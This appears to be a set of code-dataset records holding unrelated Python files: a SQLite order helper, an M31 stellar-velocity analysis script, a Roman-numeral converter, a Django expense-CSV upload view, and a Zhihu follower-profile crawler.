                if source is not None:\n                    value['source'] = source\n                if destination is not None:\n                    value['destination'] = destination\n                if last_date is not None:\n                    value['last_date'] = last_date\n                if type is not None:\n                    value['type'] = type\n                if dr_source is not None:\n                    value['dr_source'] = dr_source\n                if dr_destination is not None:\n                    value['dr_destination'] = dr_destination\n                value = json.dumps(value)\n                db[user_id] = value\n                return db[user_id]\n            except KeyError:\n                return 'no session for this user'\n\n\nclass DBHelper:\n    def __init__(self, dbname=\"data.sqlite\"):\n        self.dbname = dbname\n        self.conn = sqlite3.connect(dbname, check_same_thread=False)\n        self.setup()\n\n    def setup(self):\n        stmt = \"CREATE TABLE IF NOT EXISTS orders (id integer primary key, \" \\\n               \"user text, \" \\\n               \"source text, \" \\\n               \"destination text, \" \\\n               \"last_date text,\" \\\n               \"type text,\" \\\n               \"created_datetime datetime)\"\n        self.conn.execute(stmt)\n        self.conn.commit()\n\n    def add_order(self, user, source, destination, last_date, type):\n        now = datetime.datetime.now()\n        stmt = \"INSERT INTO orders (user, source, destination, last_date, type, \" \\\n               \"created_datetime) VALUES (?, ?, ?, ?, ?, ?)\"\n        args = (user, source, destination, last_date, type, now)\n        self.conn.execute(stmt, args)\n        self.conn.commit()\n\n    def get_own_orders(self, username):\n        stmt = \"SELECT * FROM orders where user = (?)\"\n        args = (username,)\n        items = []\n        for row in self.conn.execute(stmt, args):\n            items.append(row)\n        print(items)\n        return items\n\n    def delete_order(self, id):\n        stmt = \"DELETE FROM orders WHERE id = (?)\"\n        args = (id,)\n        self.conn.execute(stmt, args)\n        self.conn.commit()\n\n    def delete_all(self):\n        stmt = \"DELETE FROM orders\"\n        self.conn.execute(stmt)\n        self.conn.commit()\n\n    def get_orders(self):\n        stmt = \"SELECT * FROM orders\"\n        items = []\n        for row in self.conn.execute(stmt):\n            items.append(row)\n        print(items)\n        return items\n\n    def drop_table(self):\n        stmt = \"DROP TABLE orders\"\n        self.conn.execute(stmt)\n        print('dropped')\n        return 'done'\n\n    def search_order(self, source, destination):\n        items = list()\n        stmt = \"SELECT * FROM orders WHERE source = (?) 
AND destination = (?)\"\n args = (source, destination)\n for row in self.conn.execute(stmt, args):\n items.append(row)\n return items\n","sub_path":"dbhelper.py","file_name":"dbhelper.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"382136437","text":"import numpy as np \nfrom astropy.io import fits\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord, EarthLocation\nfrom astropy import constants as const\nfrom astropy.time import Time\n\n#original data ================================================================================================================================\nhdu = fits.open('/Users/amandaquirk/Documents/AsymmetricDrift/Data/subMasterSPLASH.fits', memmap = True)\ndata = hdu[1].data\nra = data['RA']\ndec = data['Dec']\nredshift = data['Z']\ntime = data['MJD']\naband = data['ABAND']\nprint('read in subMasterSPLASH')\n\n#read in data from age groups =================================================================================================================\ndef read_data(agebin):\n\t#xi, eta, verr, n, HI, index in subMasterSPLASH\n\tage_data = np.loadtxt('/Users/amandaquirk/Documents/AsymmetricDrift/Data/{}_individual_chemin.txt'.format(agebin), usecols=(0, 1, 3, 4, 5, 8), unpack=True)\n\treturn age_data\n\nMS_data = read_data('MS')\nAGy_data = read_data('AGy')\nAGo_data = read_data('AGo')\nRG_data = read_data('RG')\nprint('read in age data')\n\n#correct the velocities ======================================================================================================================\nkeck = EarthLocation.from_geodetic(lat=19.8283*u.deg, lon=-155.4783*u.deg, height=4160*u.m)\n\ndef correct_vel(data_array):\n\tinds = data_array[-1]\n\tinds = [int(a) for a in inds]\n\n\tras = ra[inds]\n\tdecs = dec[inds]\n\tsc = SkyCoord(ra=ras, dec=decs, unit=(u.hourangle, u.deg))\n\ttimes = time[inds]\n\tzs = redshift[inds]\n\tabands = aband[inds]\n\n\theliocorr = sc.radial_velocity_correction('heliocentric', obstime=Time(times, format='mjd'), location=keck) \n\theliocorr_km_s = heliocorr.to(u.km/u.s) \n\tvraw = zs * const.c.to(u.km/u.s)\n\tvcorr = vraw + heliocorr_km_s - abands * const.c.to(u.km/u.s)\n\n\treturn vcorr.value #km/s\n\nMS_v = correct_vel(MS_data)\nAGy_v = correct_vel(AGy_data)\nAGo_v = correct_vel(AGo_data)\nRG_v = correct_vel(RG_data)\nprint('did velocity corrections')\n\n#smoothing data ============================================================================================================================\n#function to calculate the weights\ndef calc_weights(err):\n return 1 / (err**2)\n\ndef normed_weight(w):\n sum_weights=sum(w)\n return w / sum_weights\n\n#function does the weighted meean\ndef weighted_mean(data,norm_w):\n\treturn sum(data * norm_w)\n\n#function does the weighted RMSE\ndef weighted_rmse(norm_w, data, mean):\n\tdiff_sq = (data - mean)**2\n\treturn np.sqrt(sum(diff_sq * norm_w))\n\ndef smoothing(data_array, velocities, circleSize):\n\tsmoothed_v = []\n\tdispersion = []\n\t#below these values are not actually smoothed, just saving the ones for good centers\n\txi_goodcenter = []\n\teta_goodcenter = []\n\tsmoothed_n = []\n\tsmoothed_err = []\n\tsmoothed_HI = []\n\tsmoothed_ind = []\n\n\t#remove stars that have unreliable velocities\n\treliable = abs(velocities) < 1000\n\tras = data_array[0][reliable]\n\tdecs = data_array[1][reliable]\n\terrs = data_array[2][reliable]\n\tns = data_array[3][reliable]\n\tHI = 
data_array[4][reliable]\n\tind = data_array[5][reliable]\n\tvelocities = velocities[reliable]\n\n\tweight = calc_weights(errs) #error is already adjusted so can just calculate the weights\n\tsc = SkyCoord(ra=ras, dec=decs, unit=(u.deg,u.deg))\n\tfor i in range(len(ras)):\n\t\tc1 = SkyCoord(ras[i], decs[i], unit=(u.deg,u.deg)) #go through all coordinates one at a time\n\t\tsep = c1.separation(sc)\n\t\tgood = sep.arcsecond < circleSize #put stars into smoothing circle of this size\n\t\tvelocities_circ = velocities[good]\n\t\tweight_circ = weight[good]\n\t\tif len(velocities_circ) > 15: #only want circles with at least 15 stars\n\t\t\tnormed_weights = normed_weight(weight_circ)\n\t\t\tsmoothed_v.append(weighted_mean(velocities_circ, normed_weights)) #average the velocites\n\t\t\tdispersion.append(weighted_rmse(normed_weights, velocities_circ, weighted_mean(velocities_circ, normed_weights)))\n\t\t\txi_goodcenter.append(ras[i] * 13.67) #kpc\n\t\t\teta_goodcenter.append(decs[i]* 13.67) #kpc\n\t\t\tsmoothed_n.append(ns[i])\n\t\t\tsmoothed_err.append(errs[i])\n\t\t\tsmoothed_HI.append(HI[i])\n\t\t\tsmoothed_ind.append(ind[i])\n\treturn xi_goodcenter, eta_goodcenter, smoothed_v, smoothed_err, dispersion, smoothed_HI, smoothed_n, smoothed_ind\n\nMS_smoothed_data = smoothing(MS_data, MS_v, 200)\nprint('done with MS smoothing')\nAGy_smoothed_data = smoothing(AGy_data, AGy_v, 275)\nprint('done with AGy smoothing')\nAGo_smoothed_data = smoothing(AGo_data, AGo_v, 275)\nprint('done with AGo smoothing')\nRG_smoothed_data = smoothing(RG_data, RG_v, 200)\nprint('done with RG smoothing')\n\n# #calculating rotation velocity =================================================================================================================\n#deproject coordinates\ndef x(xi, eta): #xi and eta in kpc\n\txi_deg = xi / 13.67\n\teta_deg = eta / 13.67\n\tsine = np.sin(37 * np.pi / 180)\n\tcosine = np.cos(37 * np.pi / 180)\n\tx =(xi_deg * cosine) - (eta_deg * sine)\n\treturn x \n\ndef y(xi, eta): #xi and eta in kpc\n\txi_deg = xi / 13.67\n\teta_deg = eta / 13.67\n\tsine = np.sin(37 * np.pi / 180)\n\tcosine = np.cos(37 * np.pi / 180)\n\ty = (eta_deg * cosine) + (xi_deg * sine)\n\treturn y\n\n#calculate the position angle -- THIS FUNCTION NEEDS TO BE MODIFIED IF Y < 0\ndef PA(xi, eta): #xi and eta in kpc\n\tx_coord = x(xi, eta)\n\ty_coord = y(xi, eta)\n\tdeg = np.zeros_like(x_coord)\n\tfor i in range(len(x_coord)):\n\t\tif x_coord[i] > 0:\n\t\t\trad = np.arctan(y_coord[i] / x_coord[i])\n\t\t\tdeg[i] = 90 - rad * 180 / np.pi\n\t\telse:\n\t\t\trad = np.arctan(y_coord[i] / x_coord[i])\n\t\t\tdeg[i] = 270 - rad * 180 / np.pi\n\treturn deg + 37 #incorporate tilt of M31\n\n#calculate deprojected radial distance\ndef distance(xi, eta): #xi and eta in kpc\n\tx_coord = x(xi, eta)\n\ty_coord = y(xi, eta)\n\tinclination_factor = np.cos(77 * np.pi / 180)**2\n\tang_dist = np.sqrt(y_coord**2 + x_coord**2 / inclination_factor)\n\treturn ang_dist * 13.67\n\n#bring in the ringed HI data for tilted ring model\nHI_r, HI_PA, HI_i, HI_v = np.loadtxt('/Users/amandaquirk/Documents/AsymmetricDrift/Data/HI_PA_i_vrot.txt', unpack=True)\nHI_PA = np.array(HI_PA)\nHI_i = np.array(HI_i)\n\ndef find_nearest_ring(radius):\n\tindices = np.zeros_like(radius)\n\tfor i in range(len(radius)):\n\t\tdiff = abs(HI_r - radius[i])\n\t\tindices[i] = int(np.argmin(diff))\n\treturn indices #index of the radius closest to the star's radius\n\n#rotation velocity using tilted ring model\ndef Vrot_tilted_ring(xi, eta, v): #LOS v\n\tPA_star = PA(xi, eta)\n\tr = 
distance(xi, eta)\n\n\t#HI ring parameters \n\tHI_inds = find_nearest_ring(r)\n\tPA_ring = np.zeros(len(HI_inds))\n\ti_ring = np.zeros(len(HI_inds))\n\tfor i in range(len(r)):\n\t\tN = int(HI_inds[i])\n\t\tPA_ring[i] = HI_PA[N]\n\t\ti_ring[i] = HI_i[N]\n\n\tdeg = np.pi / 180\n\tvsys = -300 #km/s, as defined in Claire's thesis\n\tA = (v - vsys) / np.sin(i_ring * deg)\n\tB = np.tan((PA_ring - PA_star) * deg)**2\n\tC = np.cos(i_ring * deg)**2\n\trotation_velocity = A * np.sqrt(1 + B / C)\n\treturn abs(rotation_velocity)\n\n#calculating rotation velocities\nMS_vrot = Vrot_tilted_ring(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]), np.array(MS_smoothed_data[2]))\nMS_HI_vrot = Vrot_tilted_ring(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]), np.array(MS_smoothed_data[5]))\nMS_r = distance(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]))\nAGy_vrot = Vrot_tilted_ring(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]), np.array(AGy_smoothed_data[2]))\nAGy_HI_vrot = Vrot_tilted_ring(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]), np.array(AGy_smoothed_data[5]))\nAGy_r = distance(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]))\nAGo_vrot = Vrot_tilted_ring(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]), np.array(AGo_smoothed_data[2]))\nAGo_HI_vrot = Vrot_tilted_ring(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]), np.array(AGo_smoothed_data[5]))\nAGo_r = distance(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]))\nRG_vrot = Vrot_tilted_ring(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]), np.array(RG_smoothed_data[2]))\nRG_HI_vrot = Vrot_tilted_ring(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]), np.array(RG_smoothed_data[5]))\nRG_r = distance(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]))\n\n#save the data!!\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_MS.txt', np.c_[MS_smoothed_data[0], MS_smoothed_data[1], MS_r, MS_smoothed_data[2], MS_smoothed_data[3], MS_smoothed_data[4], MS_vrot, MS_smoothed_data[5], MS_HI_vrot, MS_smoothed_data[6], MS_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_AGy.txt', np.c_[AGy_smoothed_data[0], AGy_smoothed_data[1], AGy_r, AGy_smoothed_data[2], AGy_smoothed_data[3], AGy_smoothed_data[4], AGy_vrot, AGy_smoothed_data[5], AGy_HI_vrot, AGy_smoothed_data[6], AGy_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_AGo.txt', np.c_[AGo_smoothed_data[0], AGo_smoothed_data[1], AGo_r, AGo_smoothed_data[2], AGo_smoothed_data[3], AGo_smoothed_data[4], AGo_vrot, AGo_smoothed_data[5], AGo_HI_vrot, AGo_smoothed_data[6], AGo_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_RG.txt', np.c_[RG_smoothed_data[0], RG_smoothed_data[1], RG_r, RG_smoothed_data[2], RG_smoothed_data[3], RG_smoothed_data[4], RG_vrot, RG_smoothed_data[5], RG_HI_vrot, RG_smoothed_data[6], RG_smoothed_data[7]], 
delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\n","sub_path":"Scripts/M31_vel_correction.py","file_name":"M31_vel_correction.py","file_ext":"py","file_size_in_byte":10111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"69973802","text":"#encoding: UTF-8\n\n#Author: Roberto Téllez Perezyera\n\"\"\"\nThis program reads a decimal number between 1 and 10 and prints the corresponding Roman numeral.\n\"\"\"\n\n\n#A function that takes the decimal number and returns the Roman numeral\ndef convertirDecimalARomano(numero) :\n    if numero == 10 :\n        return \"X\"\n    if numero <= 3 :\n        return numero * \"I\"\n    if numero == 5 :\n        return \"V\"\n    if numero > 3 and numero < 5 :\n        return \"IV\"\n    if numero > 8 and numero < 10 :\n        return \"IX\"\n    if numero > 5 and numero < 9 :\n        unos = numero - 5\n        return \"V\" + unos * \"I\"\n\n\n#Ask the user for a decimal number and print the Roman numeral or an error message\ndef main():\n    numero = int(input(\"Escribe tu número favorito del 1 al 10: \"))\n    if numero > 10 or numero < 1 :\n        print(\"... del 1 al 10, por favor\")\n    else :\n        numeroRomano = convertirDecimalARomano(numero)\n        print(numero, \"en romano es:\", numeroRomano)\n\n\nmain()\n","sub_path":"numerosRomanos.py","file_name":"numerosRomanos.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"58849454","text":"# Ian Carreon, iancrrn@gmail.com\n# August 27, 2016\n\n# Create your views here.\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom .forms import UploadFileForm\n\n\nfrom .models import Employee\nfrom .models import ExpenseItem\n\nimport csv\nfrom datetime import date\n\nfrom django.db.models import Count\nfrom django.db.models import F, FloatField, Sum\n\nimport calendar\n\n# helper function\n# Option: place this function in some file and do something like\n# from somefile import handle_uploaded_file\ndef handle_uploaded_file(f):\n    \n    \"\"\"\n    # for large files e.g. ~ 2GB maybe we could chunk the file\n    for chunk in f.chunks():\n        do_something_with_the(chunk)\n    \"\"\"\n    \"\"\"\n    How to handle long running asynchronous tasks: threading/multiprocessing, Celery/Redis, AWS SQS...\n    \"\"\"\n    \n    csvreader = csv.reader(f)\n\n    # This skips the first row (i.e. header) of the CSV file.\n    next(csvreader)\n\n    for row in csvreader:\n        # do stuff with each row...\n        \n        # remove any whitespace\n        row = [i.strip() for i in row]\n        \n        # Extract the expense item part\n        expense_date = row[0].split('/') # extract year, month, day\n        year = int(expense_date[2])\n        month = int(expense_date[0])\n        day = int(expense_date[1])\n        \n        category = row[1]\n        description = row[4]\n        \n        # work with integers - avoid issues working with floats\n        # convert to cents (i.e. 
multiply by 100)\n pre_tax_amount = int(float(row[5].replace(',', '')) * 100)\n tax_name = row[6]\n tax_amount = int(float(row[7].replace(',', '')) * 100)\n total_amount = int(pre_tax_amount + tax_amount)\n \n # Extract employee part\n employee_name = [i.strip() for i in row[2].split()]\n first_name = employee_name[0]\n last_name = employee_name[1]\n address = row[3]\n \n # if employee already in the databaase then use that otherwise create a new entry\n employee, created = Employee.objects.get_or_create(first_name=first_name, last_name=last_name, address=address)\n\n # if this expense item is already assigned to this employee then do nothing else create a new expense item for this employee\n expense_item, created = ExpenseItem.objects.get_or_create(date=date(year, month, day), category=category, description=description, \n pre_tax_amount=pre_tax_amount, tax_name=tax_name, tax_amount=tax_amount, total_amount=total_amount, employee=employee)\n \n\ndef upload_file(request):\n \n # used for the data to return to the template\n data = []\n \n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n \n try:\n handle_uploaded_file(request.FILES['file'])\n # catch all for now\n # but depending on the error we can bow out gracefully or continue\n # i.e if exception is an IntegrityError then continue...\n # i.e if list index out of range error then stop - possibly invalid CSV file\n except Exception as e: \n return render(request, 'upload.html', {'form': form, 'data':data, 'error_msg':e})\n \n \n # This section builds the data to return to the template as a list of 'JSON' style/dicts objects\n \"\"\"\n E.g. something like\n data = [{'year':1998, 'month_list':[{'month':'January', 'total':2.89}]}, \n {'year':2005, 'month_list':[{'month':'October', 'total':53.99}]}, \n {'year':2010, 'month_list':[{'month':'March', 'total':3.99}]}]\n \"\"\"\n \n # hit the database once\n query_set = ExpenseItem.objects.all()\n \n # get all distinct years\n years = query_set.dates('date','year')\n \n # option to sort years ASC or DESC...\n \n # Group by year\n for year in years:\n year_dict = {}\n \n year_dict['year'] = year.year\n \n month_list = []\n \n # Get the months for this year\n months = query_set.filter(date__year=year.year).dates('date','month')\n for month in months:\n \n month_dict = {}\n \n # build each month dict\n month_dict['month'] = calendar.month_name[month.month]\n result = query_set.filter(date__year=year.year).filter(date__month=month.month).aggregate(total_expenses_amount=Sum(F('total_amount'), output_field=FloatField()))\n \n month_dict['total'] = '%0.2f' % (result['total_expenses_amount']/100) # divide by 100 -> dollar and cents format\n \n # then add month dict to month list\n month_list.append(month_dict)\n \n year_dict['month_list'] = month_list\n \n data.append(year_dict) \n else:\n form = UploadFileForm()\n \n return render(request, 'upload.html', {'form': form, 'data':data, 'error_msg':None})\n","sub_path":"se_challenge/upload_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"151611392","text":"import requests\nimport codecs\nimport json\nimport time\nfrom collections import deque\nfrom bs4 import BeautifulSoup\n\nfrom enum import Enum\nclass DebugLevel(Enum):\n verbose = 1\n warning = 2\n error = 3\n end = 4\n\nclass ZhihuCrawler(object):\n def __init__(self):\n self._base_url = r\"https://www.zhihu.com\"\n 
self._start_url = r\"https://www.zhihu.com/topic/19551052/followers\"\n        self._debug_level = DebugLevel.verbose\n        self._visited_user_url = set()  # set membership lookup is O(1)\n        self._last_user_id = 1458573819\n        self._offset = 40\n        ZhihuCommon.session_init()\n        self._config = self._load_config()\n\n    def _debug_print(self, level, log_str):\n        # same level filter as ZhihuUser._debug_print; init_xsrf below relies on this method existing\n        if level.value >= self._debug_level.value:\n            print(\"[CRAWLER] \" + log_str)\n\n    def _load_config(self):\n        struct = {\"account\": r\"\", \"password\": r\"\",\n                  \"Note\": \"account can be 'email' or 'phone number'\"}\n        try:\n            with open(ZhihuCommon.config_json_file, \"r\", encoding = \"utf-8\") as fp:\n                config = json.loads(fp.read())\n                struct.update(config)\n        except Exception as e:\n            with open(ZhihuCommon.config_json_file, \"w+\", encoding = \"utf-8\") as fp:\n                fp.write(json.dumps(struct, indent=4))\n        finally:\n            return struct\n\n    def _save_user(self, user):\n        with open(ZhihuCommon.user_json_file, \"a\", encoding = \"utf-8\") as fp:\n            json_str = json.dumps(user, default = ZhihuUser.obj_to_dict, ensure_ascii = False, sort_keys = True)\n            fp.write(json_str + \"\\n\")\n\n    def init_xsrf(self):\n        \"\"\"Initialization: fetch the xsrf token from the home page\"\"\"\n\n        try:\n            # the underscore has the special meaning that \"I don't need this variable, I'm only putting something\n            # here because the API/syntax/whatever requires it\"\n            _, soup = ZhihuCommon.get(self._base_url)\n            input_tag = soup.find(\"input\", {\"name\": \"_xsrf\"})\n            xsrf = input_tag[\"value\"]\n            ZhihuCommon.set_xsrf(xsrf)\n        except Exception as e:\n            self._debug_print(DebugLevel.error, \"fail to init xsrf. \" + str(e))\n\n\n    def do_crawler(self):\n        while (self._offset < 100000):\n            post_dict = {\n                'offset': self._offset,\n                'start': self._last_user_id,\n                '_xsrf': ZhihuCommon.get_xsrf(),\n            }\n            response = ZhihuCommon.post(self._start_url, post_dict)\n            user_json = response.json()[\"msg\"][1]\n            soup = BeautifulSoup(user_json, \"html.parser\")\n            users_id = soup.find_all(\"div\", class_=\"zm-person-item\")\n            users_info = soup.find_all(\"a\", class_=\"zm-list-avatar-medium\")\n            for user_info in users_info:\n                author = ZhihuUser(self._base_url + user_info.attrs[\"href\"])\n                if author.is_valid():\n                    self._save_user(author)\n            user_num = len(users_id)\n            self._offset += user_num\n            self._last_user_id = int(users_id[user_num-1][\"id\"][3:])\n\n    def login(self):\n        \"\"\"Log in to get the authenticated session; init_xsrf must be run first\"\"\"\n\n        if not len(self._config[\"account\"]):\n            print(\"Please fill config.json with your account.\")\n\n        login_by = 'email' if '@' in self._config[\"account\"] else 'phone_num'\n        login_url = self._base_url + r\"/login/\" + login_by\n\n        post_dict = {\n            'remember_me': 'true',\n            'password': self._config[\"password\"],\n            '_xsrf': ZhihuCommon.get_xsrf(),\n        }\n        post_dict.update({login_by: self._config[\"account\"]})\n\n        response_login = ZhihuCommon.post(login_url, post_dict)\n        # response content: {\"r\":0, \"msg\": \"\\u767b\\u9646\\u6210\\u529f\" } -- msg decodes to \"login successful\"\n        return response_login.json()[\"r\"] == 0\n        #self._save_file('login_page.htm', response_login.text, response_login.encoding)\n\nclass ZhihuUser(object):\n    _extra_info_key = (\"education item\", \"education-extra item\", \"employment item\", \\\n                       \"location item\", \"position item\")\n\n    def __init__(self, user_url):\n        self._debug_level = DebugLevel.verbose\n        self._user_url = user_url\n        self._valid = self._parse_user_page()\n        if self._valid:\n            self.parse_extra_info()\n\n    def is_valid(self):\n        return self._valid\n\n    def get_url(self):\n        return self._user_url\n\n    def _debug_print(self, level, log_str):\n        if level.value >= self._debug_level.value:\n            print(\"[USER] \" + log_str)\n\n    def _save_file(self, path, str_content, encoding):\n        with codecs.open(path, 'w', encoding) as fp:\n            fp.write(str_content)\n\n
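    # a record appended by ZhihuCrawler._save_user then looks roughly like this (illustrative values only):\n    # {\"agree_cnt\": 34, \"gender\": \"Male\", \"name\": \"...\", \"thank_cnt\": 12, \"url\": \"https://www.zhihu.com/people/...\", \"education item\": \"\", ...}\n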
    @staticmethod\n    def obj_to_dict(obj):\n        \"\"\"Convert a ZhihuUser into plain dict data, used for the json dump in ZhihuCrawler._save_user\"\"\"\n        tmp_dict = {}\n        tmp_dict[\"name\"] = obj._name\n        tmp_dict[\"url\"] = obj._user_url\n        tmp_dict[\"thank_cnt\"] = obj._thank_cnt\n        tmp_dict[\"agree_cnt\"] = obj._agree_cnt\n        tmp_dict[\"gender\"] = obj._gender\n        tmp_dict[\"img_url\"] = obj._img_url\n        for key_str in ZhihuUser._extra_info_key:\n            if key_str in obj._extra_info:\n                tmp_dict[key_str] = obj._extra_info[key_str]\n            else:\n                tmp_dict[key_str] = \"\"\n\n        return tmp_dict\n\n    def _parse_user_page(self):\n        try:\n            _, soup = ZhihuCommon.get(self._user_url)\n            self.soup = soup\n            # class_ searches by CSS class; 'class' is a reserved word, so BeautifulSoup renames the argument\n            head_tag = soup.find(\"div\", class_=\"zm-profile-header\")\n            name_tag = head_tag.find(\"span\", class_=\"name\")\n            name = name_tag.contents[0]\n            agree_tag = head_tag.find(\"span\", class_=\"zm-profile-header-user-agree\")\n            agree_cnt = agree_tag.contents[1].contents[0]\n            thank_tag = head_tag.find(\"span\", class_=\"zm-profile-header-user-thanks\")\n            thank_cnt = thank_tag.contents[1].contents[0]\n            img_url = soup.find(\"img\", class_=\"Avatar Avatar--l\")\n            gender_tag = head_tag.find(\"span\", class_=\"item gender\")\n            if gender_tag is None:\n                self._gender = \"Unknown gender\"\n            else:\n                # gender_tag.contents[0][\"class\"] is a list; every element of the list is a string\n                gender_str = gender_tag.contents[0][\"class\"][1]\n                if \"female\" in gender_str:\n                    self._gender = \"Female\"\n                elif \"male\" in gender_str:\n                    self._gender = \"Male\"\n                else:\n                    self._gender = \"Unknown gender\"\n            self._name = name\n            self._thank_cnt = int(thank_cnt)\n            self._agree_cnt = int(agree_cnt)\n            self._img_url = img_url.attrs[\"src\"]\n            is_ok = True\n            self._debug_print(DebugLevel.verbose, \"parse \" + self._user_url + \" ok. \" + \"name:\" + self._name)\n        except Exception as e:\n            self._debug_print(DebugLevel.warning, \"some exception raised by parsing \" \\\n                + self._user_url + \" ErrInfo: \" + str(e))\n            is_ok = False\n        finally:\n            return is_ok\n\n
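    # pull optional profile fields (education, employment, location, ...); each key in\n    # _extra_info_key names a span whose title attribute carries the value\n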
    def parse_extra_info(self):\n        self._extra_info = {}\n        for key_str in self._extra_info_key:\n            tag = self.soup.find(\"span\", class_=key_str)\n            if tag is not None:\n                self._extra_info[key_str] = tag[\"title\"]\n\n\n    def __str__(self):\n        # the string printed for an instance of this class\n        out_str = \"User \" + self._name + \" agree: \" + str(self._agree_cnt) + \", \" \\\n                  \"thank: \" + str(self._thank_cnt) + \" \" + self._gender + \" \"\n\n        for key_str in self._extra_info_key:\n            if key_str in self._extra_info:\n                out_str += \" \" + key_str + \": \" + self._extra_info[key_str]\n\n        return out_str\n\nclass ZhihuCommon(object):\n    \"\"\"Code shared by the ZhihuCrawler, ZhihuTopic and ZhihuUser classes: debug helpers, common page-fetch functions, etc.\"\"\"\n\n    root_topic = 19776749  # 19776749 root topic, 19776751 uncategorized, 19778298 metaphysics\n    unclassed_topic = 19776751\n    my_header = {\n        'Connection': 'Keep-Alive',\n        'Accept': 'text/html, application/xhtml+xml, */*',\n        'Accept-Language': 'zh-CN,zh;q=0.8',\n        'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',\n        'Accept-Encoding': 'gzip,deflate,sdch',\n        'Host': 'www.zhihu.com',\n        'DNT': '1'\n    }\n\n    \"\"\"Runtime parameters\"\"\"\n    debug_fast_crawler = False  # fast mode for debugging: when on, not every item of a kind is traversed\n    traversal_level_max = 3  # maximum depth for the depth-first traversal\n    user_json_file = \"user.json\"\n    answer_json_file = \"answer.json\"\n    topic_json_file = \"topic.json\"\n    config_json_file = \"config.json\"\n\n    _last_get_page_fail = False  # did the previous get_page call fail?\n    _xsrf = None\n    _session = None\n\n    @staticmethod\n    def set_xsrf(xsrf):\n        ZhihuCommon._xsrf = xsrf\n\n    @staticmethod\n    def get_xsrf():\n        return ZhihuCommon._xsrf\n\n    @staticmethod\n    def session_init():\n        ZhihuCommon._session = requests.Session()\n\n    @staticmethod\n    def get_session():\n        return ZhihuCommon._session\n\n    @staticmethod\n    def get(url):\n        try_time = 0\n\n        while try_time < 5:\n            # the previous page fetch failed, pause for 10 seconds\n            if ZhihuCommon._last_get_page_fail:\n                time.sleep(10)\n\n            try:\n                try_time += 1\n                response = ZhihuCommon.get_session().get(url, headers = ZhihuCommon.my_header, timeout = 30)\n                #, cert = 'F:\Programs\Class-3-Public-Primary-Certification-Authority.pem')\n                soup = BeautifulSoup(response.text, \"html.parser\")\n                ZhihuCommon._last_get_page_fail = False\n                return response.text, soup\n            except Exception as e:\n                print(\"fail to get \" + url + \" error info: \" + str(e) + \" try_time \" + str(try_time))\n                ZhihuCommon._last_get_page_fail = True\n        else:\n            raise RuntimeError(\"failed to get \" + url)  # this function cannot handle the failure itself, so surface it to the top-level caller\n\n    @staticmethod\n    def post(url, post_dict):\n        try_time = 0\n\n        while try_time < 5:\n            # the previous page fetch failed, pause for 10 seconds\n            if ZhihuCommon._last_get_page_fail:\n                time.sleep(10)\n\n            try:\n                try_time += 1\n                response = ZhihuCommon.get_session().post(url, headers = ZhihuCommon.my_header, data = post_dict, timeout = 30)\n                #, cert = 'F:\Programs\Class-3-Public-Primary-Certification-Authority.pem')\n                ZhihuCommon._last_get_page_fail = False\n                return response\n            except Exception as e:\n                print(\"fail to post \" + url + \" error info: \" + str(e) + \" try_time \" + str(try_time))\n                ZhihuCommon._last_get_page_fail = True\n        else:\n            raise RuntimeError(\"failed to post \" + url)  # this function cannot handle the failure itself, so surface it to the top-level caller\n\n
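    # get() and post() above retry up to five times; _last_get_page_fail makes the next\n    # call sleep 10 seconds after any failure, serving as a crude global backoff\n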
